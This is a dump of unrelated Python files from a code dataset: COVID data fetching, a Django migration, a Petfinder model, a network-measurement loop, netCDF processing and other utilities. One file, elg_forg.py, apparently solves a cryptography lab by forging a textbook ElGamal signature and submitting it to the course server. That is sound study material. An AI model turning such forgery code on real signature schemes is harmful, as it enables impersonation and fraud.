unittest.main()\n\n","sub_path":"study_plan_sale_test/TestCase/Level3toLevel5.py","file_name":"Level3toLevel5.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168764174","text":"from datetime import datetime\nimport urllib, json, csv\nfrom urllib.request import urlopen\n\n#returns a list of all the countries\ndef get_countries():\n world_data = get_globalCases()\n c = []\n for country in world_data:\n c.append(country[0])\n return sorted(c,key=None)\n\n#returns all the data by country requested\ndef get_countryCase(c):\n world_data = get_globalCases()\n if c == \"All\":\n i = 1\n data = []\n # print(world_data[0])\n while i < len(world_data[0]):\n # print(world_data[0][i]['date'])\n date = world_data[0][i]['date']\n confirmed = 0\n deaths = 0\n recovered = 0\n j = 0\n while j < len(world_data):\n confirmed += world_data[j][i]['confirmed']\n deaths += world_data[j][i]['deaths']\n recovered += world_data[j][i]['recovered']\n j += 1\n data.append({'date':date,'confirmed':confirmed,'deaths':deaths,'recovered':recovered})\n i += 1\n return data\n else:\n for country in world_data:\n if country[0] == c:\n return country[1:]\n\n#returns an int with the total number of coronavisur cases so far\ndef get_totalGlobalCases():\n world_data = get_globalCases()\n # print(world_data)\n confirmed = 0\n for country in world_data:\n confirmed += country[-1]['confirmed']\n return confirmed\n\n#fetch global confirmed/death/recovery data by date\ndef get_globalCases():\n global_cases = [] #array storing dicts {'date': 123123, 'confirmed', 'deaths', 'recovered'}\n #read from api\n url = \"https://pomber.github.io/covid19/timeseries.json\"\n response = urlopen(url)\n data = json.loads(response.read())\n\n #global_cases = data[\"Afghanistan\"]\n\n #print(data[\"Afghanistan\"][0])\n for country in data:\n c = [country]\n for date in data[country]:\n # print(date)\n # added = False\n #go through each date already in dict, append country's data to existing data for that date\n # for stored_date in global_cases:\n #print(stored_date)\n #print(date)\n # if stored_date[\"date\"] == date[\"date\"]:\n # added = True #no need to add this date as new dict to global_cases\n # stored_date[\"confirmed\"] += date[\"confirmed\"]\n # stored_date[\"deaths\"] += date[\"deaths\"]\n # stored_date[\"recovered\"] += date[\"recovered\"]\n # #create new dictionary for date in global_cases if one wasn't found\n # if not added:\n # print([country,date])\n c.append(date)\n global_cases.append(c)\n # print(global_cases[0:10])\n return global_cases\n\n#returns list of most new country cases\ndef get_newCountryCases():\n world_data = get_globalCases()\n # print(world_data)\n data = []\n for country in world_data:\n # print(country[0])\n name = country[0]\n # print(country[-1][\"deaths\"])\n deaths = country[-1][\"deaths\"] - country[-2][\"deaths\"]\n data.append({\"country\":name, \"deaths\":deaths})\n\n\n return data\n\n# print(get_newCountryCase())\n\n#returns dictionary containing different state counts (new confirmed, total confirmed, total deaths, etc.)\n#format: [[date,statename,newcases,newdeaths]]\ndef get_globalCountData():\n url = \"https://api.covid19api.com/summary\"\n response = urlopen(url)\n data = json.loads(response.read())\n # print(type(data))\n # print(data[\"Global\"])\n return data[\"Global\"]\n\n#returns array of most recent numbers of active cases by state\n#first index of array represeents the date for the data (csv is a few days behind)\ndef get_StatesData():\n out = [] #array of arrays\n data = []\n today = datetime.today().strftime('%Y-%m-%d')\n # print(today)\n with open(\"data/us-states.csv\") as csvfile:\n csvdata = csv.reader(csvfile, delimiter=',')\n # print(csvdata)\n #convert csvreader to array\n for row in csvdata:\n data.append(row)\n #most recent date = the one at the bottom\n date = data[-1][0]\n yesterday = data[-56][0]\n #how many states/territories are included for this date (for indexing)\n rows = int(data[-1][2])\n # print(date, yesterday)\n out.append(date)\n\n #print(data[100])\n #go through data finding rows that match the date\n for idx in range(len(data)):\n if data[idx][0] == date:\n #print(int(data[idx-rows+1][3]))\n #subtract todays data from yesterday's to get # new cases/deaths\n temp = [date, data[idx][1], data[idx][2], int(data[idx][3]) - int(data[idx-rows+1][3]), int(data[idx][4]) - int(data[idx-rows+1][4]) ]\n out.append(temp)\n\n #print(out)\n return out\n\n# print(get_StatesData())\n\n#returns new cases by us county\ndef get_CountiesData():\n out = [] #array of arrays\n data = []\n today = datetime.today().strftime('%Y-%m-%d')\n # print(today)\n with open(\"data/us-counties.csv\") as csvfile:\n csvdata = csv.reader(csvfile, delimiter=',')\n # print(csvdata)\n #convert csvreader to array\n for row in csvdata:\n data.append(row)\n #most recent date = the one at the bottom\n date = data[-1][0]\n yesterday = data[-2908][0]\n #how many states/territories are included for this date (for indexing)\n rows = 2908\n # print(date, yesterday)\n out.append(date)\n\n #print(data[100])\n #go through data finding rows that match the date\n for idx in range(len(data)):\n if data[idx][0] == date:\n #print(int(data[idx-rows+1][3]))\n #subtract todays data from yesterday's to get # new cases/deaths\n temp = [date, data[idx][1], data[idx][2], data[idx][3], int(data[idx][4]) - int(data[idx-rows+1][4]), int(data[idx][5]) - int(data[idx-rows+1][5]) ]\n out.append(temp)\n\n #print(out)\n return out\n\n# print(get_CountiesData())\n\n #returns states-albers-10m.json as a variable\ndef get_statesjson():\n with open(\"static/json/states-albers-10m.json\") as jsonfile:\n data = json.loads(jsonfile.read())\n return data\n\n#returns counties-albers-10m.json as a variable\ndef get_countiesjson():\n with open(\"static/json/counties-albers-10m.json\") as jsonfile:\n data = json.loads(jsonfile.read())\n return data\n\n# get_statesjson()\n\n#returns countries-50m.json as a variable\ndef get_worldjson():\n with open(\"static/json/countries-50m.json\") as jsonfile:\n data = json.loads(jsonfile.read())\n return data\n\n# print(sorted(get_countries(),key=None))\n","sub_path":"app/getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491695630","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('courses', '0003_auto_20150724_0223'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Lesson',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(verbose_name='Nome', max_length=100)),\n ('description', models.TextField(verbose_name='Descrição', blank=True)),\n ('number', models.IntegerField(default=0, verbose_name='Número (ordem)', blank=True)),\n ('release_date', models.DateField(null=True, verbose_name='Data de Liberação', blank=True)),\n ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),\n ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atualizado em')),\n ('course', models.ForeignKey(related_name='lessons', to='courses.Course', verbose_name='Curso')),\n ],\n options={\n 'ordering': ['number'],\n 'verbose_name': 'Aula',\n 'verbose_name_plural': 'Aulas',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Material',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(verbose_name='Nome', max_length=100)),\n ('embedded', models.TextField(verbose_name='Video embedded', blank=True)),\n ('archive', models.FileField(upload_to='lessons/materials', null=True, blank=True)),\n ('lesson', models.ForeignKey(related_name='materials', to='courses.Lesson', verbose_name='Aula')),\n ],\n options={\n 'verbose_name': 'Material',\n 'verbose_name_plural': 'Materiais',\n },\n bases=(models.Model,),\n ),\n migrations.AlterField(\n model_name='announcement',\n name='course',\n field=models.ForeignKey(related_name='announcements', to='courses.Course', verbose_name='Curso'),\n ),\n ]\n","sub_path":"simplemooc/simplemooc/simplemooc/courses/migrations/0004_auto_20150724_1924.py","file_name":"0004_auto_20150724_1924.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485869018","text":"# -*- coding: utf-8 -*-\n\nfrom sklearn.metrics import cohen_kappa_score\nfrom sklearn.metrics import make_scorer\n#from tmfeatures import TMFeatureExtractor\nfrom sklearn.model_selection import train_test_split\nfrom imblearn.datasets import make_imbalance\nfrom sklearn.preprocessing import LabelEncoder\n#import matplotlib.pyplot as plt\nfrom collections import Counter\nimport xgboost as xgb\n#import seaborn as sns\nimport pandas as pd\nimport numpy as np\n#import glob\nimport os\n\n#####\n# Helper Functions\n####\n\ndef kappa(y_true, y_pred):\n \"\"\"\n kappa score calculator\n \"\"\"\n return cohen_kappa_score(y_true, y_pred, weights='quadratic')\n\n\ndef PetsByRescuerID(df):\n \"\"\"\n Input: dataset\n Output: returns the number of pets with same RescuerID on PetsByRescuerID\n \"\"\"\n rescuer_count = df.groupby(['RescuerID'])['PetID'].count().reset_index()\n rescuer_count.columns = ['RescuerID', 'PetsByRescuerID']\n df = df.merge(rescuer_count, how='left', on='RescuerID')\n return df\n\ndef PetsByState(df):\n \"\"\"\n Input: dataset\n Output: returns the total number of pets per state\n \"\"\"\n petsbystate_count = df.groupby(['State'])['PetID'].count().reset_index()\n petsbystate_count.columns = ['State', 'PetsByState']\n df = df.merge(petsbystate_count, how='left', on='State')\n return df\n\ndef PetsbyBreed(df):\n \"\"\"\n Input: dataset\n Output: returns the number of pets per Breed\n \"\"\"\n PetAdoptedTheMost_count = df.groupby(['Breed1'])['PetID'].count().reset_index()\n PetAdoptedTheMost_count.columns = ['Breed1', 'Total']\n df = df.merge(PetAdoptedTheMost_count, how='left', on='Breed1')\n return df\n\ndef PureBreed(df):\n \"\"\"\n Input: dataset\n Output: set dataframe with pure column\n \"\"\"\n df['PureBreed'] = np.where(df.Breed2 == 0, 1,0)\n \ndef StringToNumer(df, label):\n label_encoder = LabelEncoder()\n df[label] = label_encoder.fit_transform(df[label])\n train[label].head()\n\ndef ratio_func(y, multiplier, minority_class):\n target_stats = Counter(y)\n return {minority_class: int(multiplier * target_stats[minority_class])}\n\ndef balance_data(df):\n X = df.drop(['AdoptionSpeed','PetID', 'Description', 'Name'], axis=1)\n col_names = X.columns\n y = df.AdoptionSpeed \n # Sampling for class 4\n X_4, y_4 = make_imbalance(X, y, sampling_strategy=ratio_func,\n **{\"multiplier\": 0.098,\n \"minority_class\": 4})\n #print(Counter(y_4)) \n # Sampling for class 3\n X_3, y_3 = make_imbalance(X_4, y_4, sampling_strategy=ratio_func,\n **{\"multiplier\": 0.126,\n \"minority_class\": 3})\n #print(Counter(y_3))\n \n # Sampling for class 4\n X_2, y_2 = make_imbalance(X_3, y_3, sampling_strategy=ratio_func,\n **{\"multiplier\": 0.102,\n \"minority_class\": 2})\n #print(Counter(y_2))\n \n # Sampling for class 4\n X_1, y_1 = make_imbalance(X_2, y_2, sampling_strategy=ratio_func,\n **{\"multiplier\": 0.1,\n \"minority_class\": 1})\n print(Counter(y_1))\n \n \n X_1 = pd.DataFrame(X_1)\n y_1 = pd.DataFrame(y_1)\n \n X_1.columns = col_names\n\n return X_1, y_1\n \n\n#####\n# Load Data\n####\nDATA_FOLDER = '../input/'\n\ntrain = pd.read_csv(os.path.join(DATA_FOLDER,'train/train.csv')) # Tabular/text data for the training set\ntest = pd.read_csv(os.path.join(DATA_FOLDER,'test/test.csv')) # Tabular/text data for the test set\nsub = pd.read_csv(os.path.join(DATA_FOLDER,'sample_submission.csv')) # A sample submission file in the correct format\nbreeds = pd.read_csv(os.path.join(DATA_FOLDER,'breed_labels.csv')) # Contains Type, and BreedName for each BreedID. Type 1 is dog, 2 is cat.\ncolors = pd.read_csv(os.path.join(DATA_FOLDER,'color_labels.csv')) # Contains ColorName for each ColorID\nstates = pd.read_csv(os.path.join(DATA_FOLDER,'state_labels.csv')) # Contains StateName for each StateID\n\n\n#####\n# Data Visualization\n####\n# plot the samples\n#plt.scatter(train.Age, train.Fee, c=train.AdoptionSpeed, cmap=plt.cm.Paired, edgecolors='k')\n# Check label's data distribution\n#plt.hist(train.AdoptionSpeed)\n\n\n# \"Class Imbalance Problem\" : https://datascience.stackexchange.com/questions/13990/how-to-deal-with-a-skewed-data-set-having-all-the-samples-almost-similar\n\n\n#####\n# Data Transformation \n####\n\ntrain = PetsByRescuerID(train)\ntest = PetsByRescuerID(test)\n\ntrain = PetsByState(train)\ntest = PetsByState(test)\n\nPureBreed(train)\nPureBreed(test)\n\n# Transform RescueID string to numbers\nStringToNumer(train,\"RescuerID\")\nStringToNumer(test,\"RescuerID\")\n\nX_resample, y_resample = balance_data(train)\n\n\n### This is in process\n#path_to_sentiment_folder = os.path.join(DATA_FOLDER,'train_sentiment/*')\n#train_sentiment_files = glob.glob(path_to_sentiment_folder)\n#tm_extractor = TMFeatureExtractor(normalization=False)\n#df_sentiment_train = tm_extractor.parse_sentiment_files(train_sentiment_files)\n#######\n\n\n\n#####\n# Data Preprocessing\n####\ntarget2 = train['AdoptionSpeed']\nclean_df = train.drop(columns=['Name', 'Description', 'PetID', 'AdoptionSpeed'])\nclean_test = test.drop(columns=['Name', 'Description', 'PetID'])\n\nx_normalized = X_resample\ntarget = y_resample\nX_test = clean_test\n\n# Split for final validation\nX_train2, X_valid2, y_train2, y_valid2 = train_test_split(clean_df, target2, test_size=0.2, random_state=42)\n# Split data\nX_train, X_valid, y_train, y_valid = train_test_split(x_normalized, target, test_size=0.2, random_state=42)\n\nprint(\"X_train.shape: {}, X_valid.shape: {}\".format(X_train.shape, X_valid.shape))\n#plt.hist(y_train)\n#plt.hist(y_valid)\n#####\n# Modeling\n####\n# Preparation for XGBoost\nd_train = xgb.DMatrix(X_train, label=y_train)\nd_valid = xgb.DMatrix(X_valid, label=y_valid)\n\nwatchlist = [(d_train, 'train'), (d_valid, 'valid')]\n\nxgb_params = {'objective' : 'multi:softmax',\n 'eval_metric' : 'mlogloss',\n 'eta' : 0.05,\n 'max_depth' : 4,\n 'num_class' : 5,\n 'lambda' : 0.8\n}\n\nprint('Fitting XGBoost: ')\nbst = xgb.train(xgb_params, d_train, 400, watchlist, early_stopping_rounds=50, verbose_eval=0)\nscorer = make_scorer(kappa)\n\n\n#####\n# Testing\n####\nscore = kappa(bst.predict(xgb.DMatrix(X_valid)).astype(int), y_valid)\nname = 'XGBoost'\nprint('{} score: {}'.format(str(name), round(score, 5)))\n\n\nscore = kappa(bst.predict(xgb.DMatrix(X_valid2)).astype(int), y_valid2)\nname = 'XGBoost'\nprint('{} score: {}'.format(str(name), round(score, 5)))\n\n#####\n# Generate results\n####\n\npreds = bst.predict(xgb.DMatrix(X_test)).astype(int)\nresults = pd.DataFrame({'PetID': test.PetID, 'AdoptionSpeed': preds})\n#results.to_csv('submission.csv', index = False)","sub_path":"petfinder/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":6818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"575022069","text":"import json, time, runtime\nfrom asnake.client import ASnakeClient\nfrom asnake.client.web_client import ASnakeAuthError\n\n# Create a client\nclient = ASnakeClient()\nclient.authorize() # login, using default values\n\n# print instructions\nprint (\"This script will add the container_profiles included in a separate json file to ArchivesSpace.\")\ninput(\"Press Enter to continue...\")\n\n# post container_profiles\nprint (\"The following container profiles have been added to ArchivesSpace:\")\njsonfile = open(\"containerProfiles.json\")\njsonfile = json.load(jsonfile)\nfor container_profile in jsonfile:\n post = client.post(\"/container_profiles\", json=container_profile).json()\n print (post)\n\nprint (\"You've just completed your first API POST. Congratulations!\")\n","sub_path":"postContainerProfiles.py","file_name":"postContainerProfiles.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481593249","text":"from vkBot.settings import *\nfrom vkBot.controllers.message_process import *\n\n\ndef parse_vk_case(data):\n if data['type'] == 'confirmation':\n return vk_confirmation_token\n elif data['type'] == 'message_new':\n user_id = data['object']['user_id']\n message = data['object']['body']\n return process_message(user_id, message, source=0)\n elif data['type'] == 'message_allow':\n user_id = data['object']['user_id']\n return process_allow_messaging(user_id=user_id, source=0)\n","sub_path":"vkBot/controllers/vk_controller.py","file_name":"vk_controller.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"223981127","text":"#!/usr/bin/python3.4\n\n# Repeats an experiment after a sleep time of 30 minutes\n# Receiver version\n# Author Gloire Rubambiza\n# Version 07/02/2017\n\nimport subprocess\nfrom subprocess import TimeoutExpired\nimport time\n\n# Get the directory where to send the file for an experiment\ndirectory = subprocess.check_output(\"./Dir_Creation\", universal_newlines=True)\nprint(\"The day's directory is %s\", directory)\ndirectory = directory[:26]\nprint(\"The new day's directory is %s\", str(directory))\n\n# To be used as the template of return codes\n# It is supposed to be 0, i.e. success every time\nreturn_code = subprocess.call([\"ls\", \"-l\"])\nprint(\"The return code is %s\", return_code)\n\n\n# Repeat the process until the end of daily experiments\n# Send the output to the file of the day\nwhile return_code == 0:\n\ttry:\n\t filename = subprocess.check_output([\"./FileCreation\"], universal_newlines=True)\n\t filename = filename[:37]\n\texcept CalledProcessError as cpe:\n\t print(\"Process of file creation failed!\\n\")\n\t print(\"The return code was %d\\n\", cpe.returncode)\n\t print(\"The output is %s\", str(cpe.ouput))\n\n\ttry:\n # An example of a sender's DNS\n\t sender= \"35.185.253.131\"\n\t return_code = subprocess.call([\"./pathload_rcv\", \"-s\", sender, \"-o\", filename])\n\texcept TimeoutExpired:\n\t print(\"The child process is done running pathload\\n\")\n \n # Check the return code before going to sleep\n\t# Check the return code before going to sleep\n\t# If successful, move the file to its right directory\n\tif return_code != 0:\n\t print(\"Return code error, child process failed\")\n\telse:\n\t return_code = subprocess.call([\"mv\", filename, directory])\n\t trace_filename = filename[:34] + \"_trace\"\n\t t_open = open(trace_filename, \"w\")\n\t try:\n\t return_code = subprocess.call([\"traceroute\", sender], stdout=t_open)\n\t t_open.close()\n\t return_code = subprocess.call([\"mv\", trace_filename, directory])\n\t except TimeoutExpired:\n\t print(\"The traceroute was not successful!\\n\")\n\ttime.sleep(60*5)\n \n \n \n\n","sub_path":"pathload_and_traceroute_experiments/sender_receiver_files/ReceiverJapan.py","file_name":"ReceiverJapan.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"550174355","text":"'''\nCreated on Sep 9, 2016\n\n@author: chogg\n'''\nimport os\nimport argparse\nimport sys\nimport numpy\nimport netCDF4\nimport netCDF4.utils\nfrom netCDF4 import netcdftime\nimport netcdftime\nfrom netCDF4 import Dataset\nfrom datetime import datetime\n\ndef process_files(path_base):\n \n file_name = ''.join([path_base,\"\\\\\",\"tmin.nc\"])\n with Dataset(file_name, 'w', format=\"NETCDF4_CLASSIC\") as ds:\n \n ds.createDimension(\"time\", None)\n ds.createDimension(\"y\", 647)\n ds.createDimension(\"x\", 602)\n \n albers = ds.createVariable(\"albers_conical_equal_area\", \"S1\")\n setattr(albers, \"grid_mapping_name\", \"albers_conical_equal_area\")\n setattr(albers, \"false_easting\", 0.0)\n setattr(albers, \"false_northing\" , 0.0)\n setattr(albers, \"latitude_of_projection_origin\", 23.0)\n setattr(albers, \"longitude_of_central_meridian\", -84.0)\n setattr(albers, \"standard_parallel\", (29.5, 45.5))\n setattr(albers, \"longitude_of_prime_meridian\", 0.0)\n setattr(albers, \"semi_major_axis\", 6378137.0)\n setattr(albers, \"inverse_flattening\", 298.257222101)\n setattr(albers, \"spatial_ref\", \"PROJCS[\\\"unnamed\\\",GEOGCS[\\\"NAD83\\\",DATUM[\\\"North_American_Datum_1983\\\",SPHEROID[\\\"GRS 1980\\\",6378137,298.257222101,AUTHORITY[\\\"EPSG\\\",\\\"7019\\\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\\\"EPSG\\\",\\\"6269\\\"]],PRIMEM[\\\"Greenwich\\\",0,AUTHORITY[\\\"EPSG\\\",\\\"8901\\\"]],UNIT[\\\"degree\\\",0.0174532925199433,AUTHORITY[\\\"EPSG\\\",\\\"9108\\\"]],AUTHORITY[\\\"EPSG\\\",\\\"4269\\\"]],PROJECTION[\\\"Albers_Conic_Equal_Area\\\"],PARAMETER[\\\"standard_parallel_1\\\",29.5],PARAMETER[\\\"standard_parallel_2\\\",45.5],PARAMETER[\\\"latitude_of_center\\\",23],PARAMETER[\\\"longitude_of_center\\\",-84],PARAMETER[\\\"false_easting\\\",0],PARAMETER[\\\"false_northing\\\",0],UNIT[\\\"METERS\\\",1]]\")\n setattr(albers, \"GeoTransform\", \"-478000 1524 0 1460296 0 -1524 \")\n \n precip = ds.createVariable(\"tmin\",'f4',(['time','y','x']), fill_value=-9999.0)\n setattr(precip, \"long_name\", \"Minimum Daily Temperature\")\n setattr(precip, \"units\", \"Degrees Fahrenheit\")\n setattr(precip, \"missing_value\", -9999.0)\n setattr(precip, \"grid_mapping\", \"albers_conical_equal_area\")\n \n time = ds.createVariable(\"time\",'f8',('time'))\n setattr(time, \"standard_name\", \"time\")\n setattr(time, \"units\", \"hour since 1895-01-01 00:00:00\")\n setattr(time, \"calendar\", \"standard\")\n \n x = ds.createVariable(\"x\",'f8',('x'))\n setattr(x, \"long_name\", \"x coordinate of projection\")\n setattr(x, \"standard_name\", \"projection_x_coordinate\")\n setattr(x, \"units\", \"m\")\n \n y = ds.createVariable(\"y\",'f8',('y'))\n setattr(y, \"long_name\", \"y coordinate of projection\")\n setattr(y, \"standard_name\", \"projection_y_coordinate\")\n setattr(y, \"units\", \"m\")\n \n directories = ['']\n file_types = ['.nc']\n xy_data = False\n for root, sub_folders, files in os.walk(path_base):\n nc_index = 0\n for file_in_root in files:\n format_path = root.replace(path_base,'')\n if format_path in directories:\n index = file_in_root.rfind('.')\n if file_in_root[index:] in file_types:\n current_file = '\\\\'.join([root,file_in_root])\n tmin, x, y = None, None, None\n \n if current_file != file_name:\n with Dataset(current_file, 'a') as ds:\n p_val = ds.variables[\"minimum daily temp\"]\n tmin = p_val[:,:]\n \n x_val = ds.variables[\"x\"]\n x = x_val[:]\n \n y_val = ds.variables[\"y\"]\n y = y_val[:]\n \n with Dataset(file_name, 'a') as ds:\n p_val = ds.variables[\"tmin\"]\n p_val[nc_index,:,:] = tmin\n \n if xy_data == False:\n x_val = ds.variables[\"x\"]\n x_val[:] = x\n \n y_val = ds.variables[\"y\"]\n y_val[:] = y\n \n xy_data = True\n \n time = ds.variables[\"time\"]\n time[nc_index] = nc_index * 24\n \n nc_index += 1\n \n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('directory',\n help='directory location to process netCDF files')\n# parser.add_argument('file_type',\n# help='type of file to concatenate')\n# \n args = parser.parse_args(sys.argv[1:])\n# \n# \n# code = process_files(args.directory)\n process_files(args.directory)\n \n print('Done processing tmin.nc!\\n')","sub_path":"frozen/tmin.py","file_name":"tmin.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"217398831","text":"# Copyright 2019 Jianwei Zhang All Right Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# =================================================================================\n\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\n\n\ndef compute_liver_tumor_hist(image, mask, liver_lab=1, tumor_lab=2, title=\"\",\n bins=50, xrng=(0, 200), alpha=0.8, density=True,\n yrng=(0, 1),\n show=True, save_path=None):\n if not show and save_path is None:\n raise ValueError(\"If not show, save_path must be provided.\")\n liver_volume = image[mask == liver_lab]\n tumor_volume = image[mask == tumor_lab]\n val1, bin1 = plt.hist(liver_volume.flat, bins=bins, range=xrng, alpha=alpha, density=density)\n val2, bin2 = plt.hist(tumor_volume.flat, bins=bins, range=xrng, alpha=alpha, density=density)\n plt.ylim(yrng)\n plt.legend([\"Liver HU intensity\", \"Tumor HU intensity\"])\n plt.xlabel(\"Intensity in CT Sequence\")\n plt.ylabel(\"Normalized bin count\")\n plt.title(title)\n\n if show:\n plt.show()\n else:\n save_path = Path(save_path)\n save_path.parent.mkdir(parents=True, exist_ok=True)\n plt.savefig(str(save_path))\n plt.close()\n\n return val1, bin1, val2, bin2\n","sub_path":"data_kits/analysis_kits.py","file_name":"analysis_kits.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"636427115","text":"class MaxNum:\n \"\"\"Required no params when running\"\"\"\n\n def __init__(self):\n self.list = []\n print(\"Input 3 number :\")\n for i in range(3):\n self.list.append(float(input()))\n self.list.sort()\n print(\"The maximum number among those numbers is : \", self.list[-1])\n\n\np13 = MaxNum()\n","sub_path":"Exercise/max_num.py","file_name":"max_num.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"599043454","text":"import os\nimport sys\nimport os.path\nsys.path.append(os.path.join(os.getcwd(), '..',))\nimport client as clt\nimport random as rnd\nfrom tools import *\nfrom fractions import gcd\n\nPARAM = \"Param\"\n\nELG_FORGERY = \"/ElGamal-forgery/\"\nPK = \"/PK\"\nVERIFY = \"/verify\"\n\nPK_URL = ELG_FORGERY + PK + NAME\nVERIFY_URL = ELG_FORGERY + VERIFY + NAME\n\nB = 'b'\nC = 'c'\nP = 'p'\nG = 'g'\nH = 'h'\nM = 'm'\nR = 0\nS = 1\nSIGNATURE = 'signature'\n\nPARAM_FILE = \"param.txt\"\n\n\ndef save_param(param_dict):\n\tparam = open(PARAM_FILE, 'w')\n\tprint(\"Saving parameters in file.\")\n\tparam.write(\"[{0}]\\n\".format(PARAM))\n\tfor key in param_dict.keys():\n\t\tparam.write(key + \"=\" + str(param_dict[key]) + \"\\n\")\n\tparam.close()\n\ndef compute_param(p, q):\n\t\"\"\"Compute the parameters needed to forge a new Elgamal signature.\n\tReturn a tuple a value (b, c)\"\"\"\n\tif os.path.exists(PARAM_FILE):\n\t\tprint(\"Parameters file exists. Extracting parameters from file.\")\n\t\timport configparser as cp\n\t\tconfig = cp.ConfigParser()\n\t\tconfig.read(PARAM_FILE)\n\t\treturn config.getint(PARAM, B), config.getint(PARAM, C)\n\telse:\n\t\tb = rnd.randint(0,p)\n\t\tc = rnd.randint(0,p)\n\n\t\ti = 0\n\t\twhile gcd(c, q) != 1:\n\t\t\ti += 1\n\t\t\tc = rnd.randint(0,p)\n\t\t\tprint(\"Generation of a new c attemp \", str(i))\n\t\tsave_param({B : b, C : c})\n\t\treturn b, c\n\ndef check_sign(p, g, h, r, s, m):\n\tvalue = (pow(h, r, p) * pow(r, s, p)) % p\n\treturn value == pow(g, m, p);\n\ndef forge_sign(p, g, h):\n\tq = p - 1\n\n\tb, c = compute_param(p, q)\n\n\tr = (pow(g, b, p) * pow(h, c, p)) % p\n\ts = (-r * modinv(c, q)) % q\n\n\tm = (b*s) % q\n\tif check_sign(p, g, h, r, s, m): # Check if the signature is correct\n\t\treturn {M : m, SIGNATURE : (r, s)}\n\telse:\t\t\t\t\t\t# The signature are not correct\n\t\tprint(\"Bad signature. :-(\\nGoodbye.\")\n\t\texit(1)\n\n\ndef get_pubkey():\n\t\"\"\"Retrieve the public key of the PS3 on the server. Return a triplet\n\tof param (p, g, h)\"\"\"\n\tsrv = clt.Server(BASE_URL)\n\ttry:\n\t\tresult = srv.query(PK_URL)\n\texcept clt.ServerError as err:\n\t\tprint_serverError_exit(err)\n\treturn result[P], result[G], result[H]\n\nif __name__ == \"__main__\":\n\tp, g, h = get_pubkey()\n\n\tsign = forge_sign(p, g, h)\n\n\tsrv = clt.Server(BASE_URL)\n\ttry:\n\t\tresult = srv.query(VERIFY_URL, sign)\n\t\tprint(result[STATUS])\n\texcept clt.ServerError as err:\n\t\tprint_serverError_exit(err)\n","sub_path":"ElGamal-forgery/elg_forg.py","file_name":"elg_forg.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644079392","text":"def firstfit(a,b):\r\n store=[]\r\n for x in a:\r\n check=checkAvailability(x,b)\r\n if check>=len(b):\r\n store.append(-1)\r\n pass\r\n else:\r\n counter=0\r\n for y in range(len(b)):\r\n if x<=b[y]:\r\n ind=y+1\r\n if ind not in store:\r\n store.append(ind)\r\n b[y]=0\r\n break\r\n else: counter=counter+1\r\n else:\r\n counter=counter+1\r\n return store\r\n\r\ndef checkAvailability(a,b):\r\n counter=0\r\n for y in b:\r\n if a>y:\r\n counter=counter+1\r\n return counter\r\n\r\nmyfile=[500,400,1000,600,700]\r\nblock=[500,200,700,800]\r\nblocksize=[500,200,700,800]\r\na=firstfit(myfile,block)\r\nprint(\"File Block Space left\")\r\nfor x in range(len(myfile)): \r\n blocknum=\"pending\"\r\n left=0\r\n block_size=0\r\n if a[x]>=1:\r\n blocknum=str(a[x])\r\n block_size=blocksize[a[x]-1]\r\n left=block_size-myfile[x]\r\n print(\" \"+str(x+1)+\" \"+str(myfile[x])+\" \"+blocknum+\" \"+str(block_size)+\" \"+str(left))\r\n ","sub_path":"oslab1b.py","file_name":"oslab1b.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"161961954","text":"#!/usr/bin/env python\nimport os\nimport h5py\nfrom geometry.source import source\nfrom geometry.receiver import receiver\nfrom geometry.shearZoneReceiver import shearZoneReceiver\nfrom export import *\n\nclass evolution(object):\n '''\n EVOLUTION is a class encapsulating the geometry and physical properties of \n fault patches for sources and receivers and methods for solving integral\n equations for fault slip.\n '''\n\n # fault self stress\n # KK[i,j] is traction s[j] due to fault slip d[i], where\n # s = 